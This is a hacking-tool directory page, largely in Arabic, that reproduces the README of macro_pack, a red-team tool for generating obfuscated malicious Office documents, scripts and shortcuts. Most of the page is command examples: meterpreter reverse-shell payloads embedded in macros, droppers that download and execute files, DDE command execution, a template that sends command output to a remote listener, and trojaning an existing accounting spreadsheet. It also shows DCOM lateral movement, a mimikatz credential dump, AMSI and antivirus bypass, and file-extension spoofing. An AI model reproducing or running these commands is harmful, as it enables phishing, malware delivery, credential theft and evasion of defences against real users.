Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
macro_pack — macro_pack هي أداة من إعداد @EmericNasi تُستخدم لأتمتة عملية التمويه (Obfuscation) وتوليد مستندات Office، وسكربتات VB، والاختصارات، وصيغ أخرى لصالح اختبار الاختراق (Pentest)، والعروض التوضيحية، وتقييمات الهندسة الاجتماعية. الهدف من macro_pack هو تبسيط عملية الاستغلال، وتجاوز برامج مكافحة البرمجيات الخبيثة، وأتمتة المسار بدءًا من توليد الماكرو والسكربتات الخبيثة وصولًا إلى توليد المستند النهائي. كما يوفر العديد من الميزات المفيدة للفرق الحمراء (Red Team) أو للبحث الأمني. | Kitploit
أدوات/GitHubGitHub/sevagas/macro_pack
أدوات التصيدأطر الاستغلالتوليد الحمولةالحركة الجانبيةالبرمجة النصية والأتمتةاستغلال تطبيقات الويباختبار الاختراقالهندسة الاجتماعيةالفريق الأحمر

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

macro_pack هي أداة من إعداد @EmericNasi تُستخدم لأتمتة عملية التمويه (Obfuscation) وتوليد مستندات Office، وسكربتات VB، والاختصارات، وصيغ أخرى لصالح اختبار الاختراق (Pentest)، والعروض التوضيحية، وتقييمات الهندسة الاجتماعية. الهدف من macro_pack هو تبسيط عملية الاستغلال، وتجاوز برامج مكافحة البرمجيات الخبيثة، وأتمتة المسار بدءًا من توليد الماكرو والسكربتات الخبيثة وصولًا إلى توليد المستند النهائي. كما يوفر العديد من الميزات المفيدة للفرق الحمراء (Red Team) أو للبحث الأمني.

Archived
GitHubsevagas/macro_pack

macro_pack

عرض المستودعالموقع الإلكتروني
2.3k414منذ 2 سنواتتمت المراجعة من قبل Kitploit
مشاركة

Supported Python versions

macro_pack

وصف قصير


تحذير: لم يتم صيانة MacroPack منذ عام 2021، إذا كنت محترفًا وتحتاج إلى أدوات هجومية للأمن السيبراني للوصول الأولي، افتراض الاختراق، تجاوز EDR، تفضل بزيارة https://www.balliskit.com


MacroPack Community هي أداة تُستخدم لأتمتة التعتيم (obfuscation) وإنشاء الصيغ القديمة مثل مستندات MS Office أو صيغ VBS المشابهة.
كما تتعامل مع عدة صيغ للاختصارات.
يمكن استخدام هذه الأداة في اختبارات الفرق الحمراء (red teaming)، اختبارات الاختراق، العروض التوضيحية، وتقييمات الهندسة الاجتماعية.
ستبسط MacroPack عملية تجاوز حلول مكافحة البرامج الضارة وتؤتمت العملية من كود vb المصدر إلى مستند Office النهائي أو نوع الحمولة الآخر.
استخدامها بسيط جدًا:

  • لا حاجة لتكوين مسبق
  • يمكن فعل كل شيء بسطر واحد من الكود
  • إنشاء أغلب صيغ Office والصيغ المعتمدة على VBS
  • حمولات مصممة لهجمات هندسة اجتماعية متقدمة (بريد إلكتروني، مفتاح USB، إلخ)

الأداة متوافقة مع الحمولات المولدة بواسطة أدوات اختبار الاختراق الشائعة (Metasploit, Empire, ...).
من السهل أيضًا دمجها مع أدوات أخرى حيث يمكن قراءة المدخلات من stdin والحصول على مخرجات هادئة لأداة أخرى.
هذه الأداة مكتوبة بلغة Python3 وتعمل على منصتي Linux و Windows.

ملاحظة: يتطلب نظام Windows مع تطبيقات MS Office المناسبة مثبتة لإنشاء مستندات Office تلقائيًا أو ميزات الترويج (trojan).

عرض توضيحي 1

التعتيم (Obfuscation)

ستستخدم الأداة تقنيات تعتيم متنوعة، كلها تلقائية.
ميزات التعتيم متوافقة مع جميع الصيغ المعتمدة على VBA و VBS التي يمكن إنشاؤها بواسطة MacroPack.
التعتيم الأساسي (خيار -o) يشمل:

  • إعادة تسمية الدوال
  • إعادة تسمية المتغيرات
  • إزالة المسافات
  • إزالة التعليقات
  • ترميز السلاسل النصية

الإنشاء (Generation)

يمكن لـ MacroPack إنشاء عدة أنواع من مستندات MS Office وصيغ البرامج النصية.
سيتم تخمين الصيغة تلقائيًا اعتمادًا على امتداد الملف المعطى.
يتم إنشاء الملف باستخدام الخيار --generate أو -G.

تسمح لك النسخة الاحترافية من MacroPack أيضًا بترويج (trojan) ملفات Office موجودة مسبقًا باستخدام الخيار --trojan أو -T.

الصيغ المدعومة من MS Office هي:

  • MS Word (.doc, .docm, .docx, .dotm)
  • MS Excel (.xls, .xlsm, .xslx, .xltm)
  • MS PowerPoint (.pptm, .potm)
  • MS Access (.accdb, .mdb)
  • MS Visio (.vsd,.vsdm)
  • MS Project (.mpp)

الصيغ النصية (scripting) المدعومة هي:

  • ملف VBA نصي (.vba)
  • ملف VBS نصي (.vbs)
  • ملف Windows Script File (.wsf)
  • مكونات Windows Script Components (.wsc, .sct)
  • تطبيقات HTML (.hta)
  • ورقة أنماط XSLT (.xsl) (نعم، XSLT من مايكروسوفت تحتوي على نصوص برمجية ^^)

الصيغ المدعومة للاختصارات/القشرة هي:

  • اختصار Shell (.lnk)
  • ملف أوامر Explorer (.scf)
  • اختصار URL (.url)
  • اختصارات Groove (.glk)
  • اختصارات الإعدادات (.settingcontent-ms)
  • مكتبة MS (.library-ms)
  • معلومات الإعداد (.inf)
  • استعلام ويب Excel (.iqy)
  • مشروع Visual Studio (.csproj)
  • سطر أوامر (.cmd)
  • ارتباط رمزي (.slk) - النسخة الاحترافية فقط
  • ملف تعليمات مضغوطة (.chm) - النسخة الاحترافية فقط

لاحظ أن جميع صيغ البرامج النصية والاختصارات (باستثناء LNK) يمكن إنشاؤها على نسخة Linux من MacroPack أيضًا.

الاستخدام الأخلاقي

يجب استخدام هذا البرنامج فقط في سياق تمرين الفريق الأحمر (Red Team)، اختبار الاختراق، محاكاة التصيد، البحث الأمني، أو أي شكل آخر من تقييمات الأمان، مع الحصول على إذن قانوني ورسمي من مالكي النظام.
استخدام هذا البرنامج لمهاجمة أهداف دون موافقة مسبقة محظور وغير قانوني.
تقع على عاتق المستخدم مسؤولية الامتثال لجميع القوانين المحلية والولائية والفدرالية والوطنية المعمول بها.
نحن لا نتحمل أي مسؤولية ولا نكون مسؤولين عن أي إساءة استخدام أو ضرر قد يحدث نتيجة استخدام هذا البرنامج.

حول الوضع الاحترافي...

ليست كل الإمكانيات والخيارات المتوفرة في MacroPack متاحة في MacroPack Community.
فقط النسخة المجتمعية متاحة على الإنترنت.
ميزات النسخة الاحترافية هي حقًا "تسليح" للعملية، ولذلك يقتصر الوصول إليها على المحترفين.
يشمل الوضع الاحترافي ميزات مثل:

  • تجاوز متقدم لمكافحة البرامج الضارة
  • طرق حقن شيل كود متقدمة
  • تعتيم سطر الأوامر (Dosfuscation)
  • تجاوز ASR و AMSI
  • حمولات VBA/VBS ذاتية الفك
  • ترويج ملفات MS Office الموجودة، ملفات المساعدة ومشاريع Visual Studio
  • تضمين حمولة خداعية (decoy)
  • الحركة الجانبية باستخدام كائنات DCOM
  • مكافحة الهندسة العكسية
  • كشف بيئة الاختبار (sandbox detection)
  • دعم المزيد من الصيغ مثل SYLK من Excel 4.0 وملفات المساعدة المضغوطة
  • تشغيل حمولة VB متقدمة من صيغ غير اعتيادية
  • قوالب مسلحة وقوالب إضافية (مثل EMPIRE، AUTOSHELLCODE)
  • ماكرو Excel 4.0 (XLM)
  • وأكثر من ذلك بكثير…

تتوفر بعض فيديوهات العرض التوضيحي القصيرة على قناة BallisKit على Vimeo.

هام: إذا كنت ترغب في الاتصال بي بشأن MacroPack pro، استخدم عنوان بريدي الإلكتروني emeric.nasi [at] sevagas.com.
لن أرد على الاستفسارات المجهولة بخصوص النسخة الاحترافية، بل فقط على الرسائل الإلكترونية المهنية.

التشغيل/التثبيت

تشغيل الملف الثنائي على Windows

  1. احصل على أحدث ملف ثنائي من https://github.com/sevagas/macro_pack/releases/
  2. قم بتحميل الملف الثنائي على جهاز كمبيوتر مثبت عليه Microsoft Office أصلي.
  3. افتح وحدة التحكم، انتقل إلى دليل الملف الثنائي واستدعِ الملف الثنائي، بهذه البساطة!```bash macro_pack.exe --help
root@kitploit:~
### التثبيت من المصادر

يجب أن تكون على جهاز يعمل بنظام Windows لبناء أداة MacroPack. قم بتنزيل وتثبيت التبعيات:```bash
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt

الأداة مكتوبة بلغة Python 3، لذا ابدأ بتثبيت python3 الخاص بك. مثال:```bash python3 macro_pack.py --help

or

python macro_pack.py --help # if python3 is default install

root@kitploit:~
إذا كنت ترغب في إنتاج ملف exe مستقل باستخدام pyinstaller:  
* تثبيت pyinstaller: pip install pyinstaller
* انقر مزدوجًا على السكريبت "build.bat".

سيكون الملف الناتج macro\_pack.exe داخل دليل **bin**.  


## بعض الأمثلة

### مجتمع MacroPack

- قائمة بجميع صيغ الملفات المدعومة```bash
macro_pack.exe --listformats
  • قائمة بجميع القوالب المتاحة```bash macro_pack.exe --listtemplates
root@kitploit:~
- إخفاء ملف vba الذي تم إنشاؤه بواسطة msfvenom ووضع النتيجة في ملف VBA جديد.```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba
  • إخفاء ملف Empire stager VBA وإنشاء مستند MS Word:```bash macro_pack.exe -f empire.vba -o -G myDoc.docm
root@kitploit:~
- إنشاء ملف MS Excel يحتوي على dropper مبهم (تنزيل payload.exe وتخزينه كـ dropped.exe)```bash
echo "https://myurl.url/payload.exe" "dropped.exe" |  macro_pack.exe -o -t DROPPER -G "drop.xlsm" 
  • إنشاء مستند Word 97 يحتوي على حمولة VBA مُبهمة من نوع reverse meterpreter داخل مجلد مشترك```bash msfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G \REMOTE-PC\Share\meter.doc
root@kitploit:~
- تنزيل وتنفيذ Empire Launcher stager بدون powershell.exe باستخدام قالب DROPPER_PS```bash
# 1 Generate a file containing Empire lauchcher 
# 2 Make that file available on web server, ex with netcat:
{ echo -ne "HTTP/1.0 200 OK\r\n\r\n"; cat empire_stager.cmd; } | nc -l -p 6666 -q1
# 3 Use macro\_pack  to generate DROPPER_PS payload in Excel file
echo http://10.5.5.12:6543/empire_stager.cmd | macro_pack.exe -o -t DROPPER_PS -G join_the_empire.xls
# 4 When executed on target, the macro will download PowerShdll, run it with rundll32, and download and execute stager.
  • تنفيذ calc.exe عبر هجوم تبادل البيانات الديناميكي (DDE)```bash echo calc.exe | macro_pack.exe --dde -G calc.xslx
root@kitploit:~
<p align="center"><img src="https://assets.kitploit.com/production/public/readmes/1646/23fa8cfadc283a7abf02bde5fd10748c8c1d90bc3d977ee47024fe4e9d963824.png" alt="Excel DDE demo"></p>


- تنزيل وتنفيذ ملف عبر powershell باستخدام هجوم Dynamic Data Exchange (DDE)```bash
# 1 Change the target file URL in resources\community\ps_dl_exec.cmd
# 2 Embed download execute cmd in document
macro_pack.exe --dde -f ..\resources\community\ps_dl_exec.cmd -G DDE.xslx
  • تشغيل الأمر (notepad.exe) عبر ملف استعلام ويب Excel و DDE```bash

1 Create dde.dat file with next content

=cmd|' /c notepad.exe'!A1

2 Host dde.dat on webserver, ex. using macro_pack -l

3 Generate .iqy file

macro_pack.exe -G dde.iqy

root@kitploit:~
<p align="center"><img src="https://assets.kitploit.com/production/public/readmes/1646/26c6e5a38eb09ae914c743b473890cef40632ccbd25bce0a895f9f4770377f7d.png" alt="IQY تجريبي"></p>


 - إنشاء ملف VBS مبهم لاتصال TCP العكسي لـ meterpreter وتشغيله ```batch
# 1 Generate obfuscated VBS based on meterpreter template as well as Metasploit resource file
echo <ip> <port> | macro_pack.exe -t METERPRETER -o -G meter.vbs
# 2 On attacker machine Setup meterpreter listener
msfconsole -r meterpreter.rc
# 3 run VBS file with wscript (run 32bit wscript because meterpreter payload is 32bit)
%windir%\SysWoW64\wscript meter.vbs

  • إنشاء ملف HTA مبهم يقوم بتنفيذ "systeminfo" وإرجاع النتيجة إلى حزمة ماكرو أخرى تستمع على 192.168.0.5```batch

1 Generate HTA file with REMOTE_CMD template

echo http://192.168.0.5:1234/a "systeminfo" | macro_pack.exe -t REMOTE_CMD -o -G info.hta

2 On 192.168.0.5 open macro_pack as http listener

macro_pack.exe -l . --port=1234

3 run hta file with mshta

mshta.exe full/path/to/info.hta

root@kitploit:~
- إنشاء اختصار url يقوم بتشغيل ملف HTA محلي عند النقر عليه```batch
 echo "file://C:\Users\username\Desktop\hello.hta" | macro_pack.exe -G yop.url
  • إنشاء اختصار lnk يقوم بتنفيذ أمر cmd لتشغيل calc.exe مع أيقونة calc.exe```batch echo '"c:\Windows\System32\cmd.exe /c calc.exe" "calc.exe"' | macro_pack.exe -G calc.lnk
root@kitploit:~
### بعض أمثلة MacroPack Pro

- Trojan ملف "report.xlsm" المشترك الحالي مع dropper. استخدم ميزات anti-AV وanti-reverse.```bash
echo "http://10.5.5.12/drop.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER --bypass --stealth --antisandox --trojan "E:\accounting\report.xls"  
  • إنشاء ملف Word يحتوي على حمولة VBA مشفّرة ذاتياً لـ x64 reverse meterpreter (ستتجاوز معظم برامج مكافحة الفيروسات).
    Keep-alive ضروري لأننا بحاجة إلى بقاء meterpreter نشطاً قبل أن نقوم بالترحيل.```bash msfvenom.bat -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o --autopack --keep-alive -G out.docm
root@kitploit:~
- حصان طروادة لملف PowerPoint مع شيلكود خام عكسي. تم تشويش الماكرو وتشويهه لتجاوز AMSI ومعظم برامج مكافحة الفيروسات.```bash
echo beacon.bin | macro_pack.exe -o -t SHELLCODE --bypass -T  hotpics.pptm
  • تنفيذ ماكرو على جهاز كمبيوتر بعيد باستخدام DCOM.```batch REM Step 1: Ensure you have enough rights net use \192.168.0.8\c$ /user:domain\username password

REM Step 2: Generate document, for example here, meterpreter reverse TCP Excel file echo 192.168.0.5 4444 | macro_pack.exe -t METERPRETER -o -G meter.xlsm REM Step 3: Copy the document somewhere on remote share copy meter.xlsm "\192.168.0.8\c$\users\username\meter.xlsm" REM Step 4: Execute! macro_pack.exe --dcom="\192.168.0.8\c$\users\username\meter.xlsm"

REM Step 2 to 4 in one step: echo 192.168.0.5 4444 | macro_pack.exe -t METERPRETER -o -G "\192.168.0.8\c$\users\username\meter.xlsm" --dcom="\192.168.0.8\c$\users\username\meter.xlsm"

root@kitploit:~
## جميع خيارات الإصدار المجتمعي```
 Main payload generation options:
    -G, --generate=OUTPUT_FILE_PATH. Generates a file. Will guess the payload format based on extension.
        MacroPack supports most Ms Office and VB based payloads as well various kinds of shortcut files.
        Note: Office payload generation requires that MS Office application is installed on the machine
    --listformats View all file formats which can be generated by MacroPack
    -f, --input-file=INPUT_FILE_PATH A VBA macro file or file containing params for --template option or non VB formats
        If no input file is provided, input must be passed via stdin (using a pipe).
    -t, --template=TEMPLATE_NAME    Use code template already included in MacroPack
        MacroPack supports multiple predefined templates useful for social engineering, redteaming, and security bypass
    --listtemplates View all templates provided by MacroPack
    -e, --embed=EMBEDDED_FILE_PATH Will embed the given file in the body of the generated document.
        Use with EMBED_EXE template to auto drop and exec the file or with EMBED_DLL to drop/load the embedded dll.


 Security bypass options:
    -o, --obfuscate Obfuscate code (remove spaces, obfuscate strings, obfuscate functions and variables name)
    --obfuscate-names-charset=<CHARSET> Set a charset for obfuscated variables and functions
        Choose between: alpha, alphanum, complete or provide the list of char you want
    --obfuscate-names-minlen=<len> Set min length of obfuscated variables and functions (default 8)
    --obfuscate-names-maxlen=<len> Set max length of obfuscated variables and functions (default 20)
    --uac-bypass Execute payload with high privileges if user is admin. Compatible with most MacroPack templates


 Other options:
    -q, --quiet Do not display anything on screen, just process request.
    -p, --print Display result file on stdout (will display VBA for Office formats)
        Combine this option with -q option to pipe result into another program
        ex: cat input_file.vba | macro_pack.exe -o -G obfuscated.vba -q -p | another_app
    -s, --start-function=START_FUNCTION   Entry point of macro file
        Note that macro_pack will automatically detect AutoOpen, Workbook_Open, or Document_Open  as the start function
    --icon Path of generated file icon. Default is %windir%\system32\imageres.dll,67
    --dde  Dynamic Data Exchange attack mode. Input will be inserted as a cmd command and executed via DDE
        This option is only compatible with Excel formats.
    --run=FILE_PATH Open document using COM to run macro. Can be useful to bypass whitelisting situations.
        This will trigger AutoOpen/Workbook_Open automatically.
        If no auto start function, use --start-function option to indicate which macro to run.
    --unicode-rtlo=SPOOF_EXTENSION Inject the unicode U+202E char (Right-To-Left Override) to spoof the file extension when view in explorers.
            Ex. To generate an hta file with spoofed jpg extension use options: -G something.hta --unicode-rtlo=jpg
            In this case, windows or linux explorers will show the file named as: somethingath.jpg
    -l, --listen=ROOT_PATH      Open an HTTP server from ROOT_PATH listening on default port 80.
    -w, --webdav-listen=ROOT_PATH Open a WebDAV server on default port 80, giving access to ROOT_PATH.
    --port=PORT Specify the listening port for HTTP and WebDAV servers.


    -h, --help   Displays help and exit
           

استخدام القوالب

يمكن استدعاء القوالب باستخدام -t, --template=TEMPLATE_NAME مع خيارات أخرى.
فيما يلي جميع القوالب المتاحة.

HELLO

قم بطباعة رسالة ترحيبية وتوعية حول الماكرو.
أعطِ هذا القالب اسم أو بريد إلكتروني للمؤلف:
-> مثال: echo "@Author" | macro_pack.exe -t HELLO -G hello.pptm

CMD

نفّذ أمرًا.
أعطِ هذا القالب سطر أوامر:
-> مثال (تشغيل calc.exe من ملف xsl): echo "calc.exe" | macro_pack.exe -t CMD -G cmd.xsl

REMOTE_CMD

نفّذ سطر أوامر وأرسل النتائج إلى خادم HTTP بعيد.
أعطِ هذا القالب عنوان URL للخادم والأمر المراد تشغيله:

-> مثال: ```echo "http://192.168.0.5:7777" "dir /Q C:" | macro_pack.exe -t REMOTE_CMD -o -G cmd.doc``````bash

Catch result with any webserver or netcat

nc -l -p 7777

root@kitploit:~
### المُسقط
تنزيل ملف وتنفيذه.  
أعطِ هذا القالب رابط الملف ومسار الملف الهدف  
  -> مثال:  ```echo <file_to_drop_url> "<download_path>" | macro_pack.exe -t DROPPER -o -G dropper.xls```
   
        
### المُسقط PS
تنزيل وتنفيذ سكربت PowerShell باستخدام rundll32 (لتجاوز الحظر على powershell.exe).  
ملاحظة: سيقوم هذا الحمولة بتنزيل PowerShdll من Github.  
أعطِ هذا القالب رابط سكربت PowerShell الذي تريد تشغيله:  
  -> مثال:  ```echo "<powershell_script_url>" | macro_pack.exe -t DROPPER_PS -o -G powpow.doc```
 
 
### المُسقط DLL
تنزيل ملف DLL بامتداد آخر وتشغيله باستخدام VBA في Office.  
-> مثال، تحميل DLL لمتربريتر باستخدام Office:```batch
REM Generate meterpreter dll payload
msfvenom.bat  -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f dll -o meter.dll
REM Make it available on webserver, ex using netcat on port 6666
{ echo -ne "HTTP/1.0 200 OK\r\n\r\n"; cat meter.dll; } | nc -l -p 6666 -q1
REM Create OFfice file which will download DLL and call it
REM The DLL URL is http://192.168.0.5:6666/normal.html and it will be saved as .asd file
echo "http://192.168.0.5:6666/normal.html" Run | macro_pack.exe -t DROPPER_DLL -o -G meterdll.xls

METERPRETER

نموذج reverse TCP الخاص بـ Meterpreter باستخدام MacroMeter من Cn33liz.
هذا النموذج هو مُجمّع Meterpreter بلغة CSharp تم بناؤه بواسطة Cn33liz ومُضمن داخل VBA باستخدام DotNetToJScript من James Forshaw.
أعطِ هذا النموذج عنوان IP ومنفذ الاستماع لـ mfsconsole:
-> مثال: echo <ip> <port> | macro_pack.exe -t METERPRETER -o -G meter.docm

ينشئ هذا النموذج أيضًا ملفًا باسم meterpreter.rc لإنشاء معالج Metasploit
-> مثال: msfconsole -r meterpreter.rc

EMBED_EXE

إسقاط وتنفيذ ملف مضمّن.
يمكن دمجه مع خيار --embed، حيث سيقوم بإسقاط الملف المضمّن وتنفيذه باسم عشوائي داخل مجلد TEMP.
-> مثال: macro_pack.exe -t EMBED_EXE --embed=c:\windows\system32\calc.exe -o -G my_calc.vbs

EMBED_DLL

يمكن دمجه مع خيار --embed، حيث سيقوم بإسقاط واستدعاء دالة في DLL معين.
أعطِ هذا النموذج اسم ومعاملات الدالة المراد استدعاؤها في DLL
-> مثال1 : echo "main" | macro_pack.exe -t EMBED_DLL --embed=cmd.dll -o -G cmd.doc
-> مثال2 : echo "main log privilege::debug sekurlsa::logonpasswords exit" | macro_pack.exe -t EMBED_DLL --embed=mimikatz.dll -o -G mimidropper.hta

الكفاءة

تم اختبار الميزات المختلفة ضد حلول مكافحة البرامج الضارة المثبتة محليًا وكذلك ضد الخدمات عبر الإنترنت.
أجريت عدة اختبارات مع أنواع مختلفة من الحمولات وميزات MacroPack.
سيتم تجنب غالبية برامج مكافحة الفيروسات الثابتة ببساطة باستخدام خيار "obfuscate".
ومع ذلك، وكما هو الحال مع معظم الأدوات المجانية، يتم اكتشاف الحمولات بشكل عام من خلال التحليل السلوكي مثل AMSI.
الميزات المتوفرة في وضع MacroPack Pro تسمح بشكل عام بتجاوز كامل لمكافحة الفيروسات بما في ذلك AMSI.

تحذير: لا تقم بإرسال عيناتك إلى الماسحات الضوئية عبر الإنترنت (مثل VirusTotal)، فهذه أفضل طريقة لكسر وحدات الماكرو المخفية الخاصة بك. أقترح أيضًا عدم الإرسال إلى المواقع غير المبلّغة مثل NoDistribute. لا يمكنك التأكد مما ستفعله هذه المواقع بالبيانات التي ترسلها. إذا كانت لديك مشكلة مع اكتشاف MacroPack من قبل مكافحة الفيروسات، يمكنك الكتابة إلينا للحصول على المشورة أو تقديم مشكلة أو طلب سحب.

الموارد ذات الصلة

مشاركات المدونة حول MacroPack Pro:

  • https://blog.sevagas.com/?Launch-shellcodes-and-bypass-Antivirus-using-MacroPack-Pro-VBA-payloads
  • https://blog.sevagas.com/?EXCEL-4-0-XLM-macro-in-MacroPack-Pro (حمولات Excel 4.0 في MacroPack Pro)
  • https://blog.sevagas.com/?Advanced-MacroPack-payloads-XLM-Injection (حقن XLM في MacroPack Pro)

مشاركات المدونة حول الاختراق باستخدام MS Office و VBS وأشياء قديمة أخرى تتعلق بالأمان:

  • https://blog.sevagas.com/?Bypass-Windows-Defender-Attack-Surface-Reduction
  • https://subt0x11.blogspot.fr/2018/04/wmicexe-whitelisting-bypass-hacking.html
  • http://blog.sevagas.com/?My-VBA-Bot (كتابة روبوت VBA كامل، يتضمن كيفية تجاوز حماية VBOM)
  • http://blog.sevagas.com/?Hacking-around-HTA-files (تشغيل كود HTA في ملفات غير HTA وملفات HTA متعددة اللغات)
  • https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ (حول هجمات Dynamic Data Exchange)
  • https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/

روابط مفيدة أخرى:

  • https://github.com/p3nt4/PowerShdll (تشغيل PowerShell باستخدام ملفات DLL فقط)
  • https://gist.github.com/vivami/03780dd512fec22f3a2bae49f9023384 (تشغيل سكريبت PowerShell باستخدام تطبيق VBA لـ PowerShdll)
  • https://github.com/EmpireProject/Empire
  • https://medium.com/@vivami/phishing-between-the-app-whitelists-1b7dcdab4279
  • https://github.com/Cn33liz/MacroMeter
  • https://github.com/khr0x40sh/MacroShop
  • https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
  • https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard

الاتصال

لا تتردد في مراسلتي على حساب تويتر @EmericNasi
البريد الإلكتروني:

  • emeric.nasi[ at ]sevagas.com
  • ena.sevagas[ at ]protonmail.com

هام: إذا كنت ترغب في الاتصال بي بخصوص MacroPack pro، فاستخدم عنوان بريدي الإلكتروني في sevagas.com. كما يرجى ملاحظة أنني لن أرد على الاستفسارات المجهولة بخصوص الإصدار Pro، بل فقط على رسائل البريد الإلكتروني المهنية.

الترخيص والاعتمادات

رخصة أباتشي 2.0

حقوق الطبع والنشر 2017,2018,2019,2020,2021,2022 إيميريك "Sio" ناسي (blog.sevagas.com)

تنزيل الأداة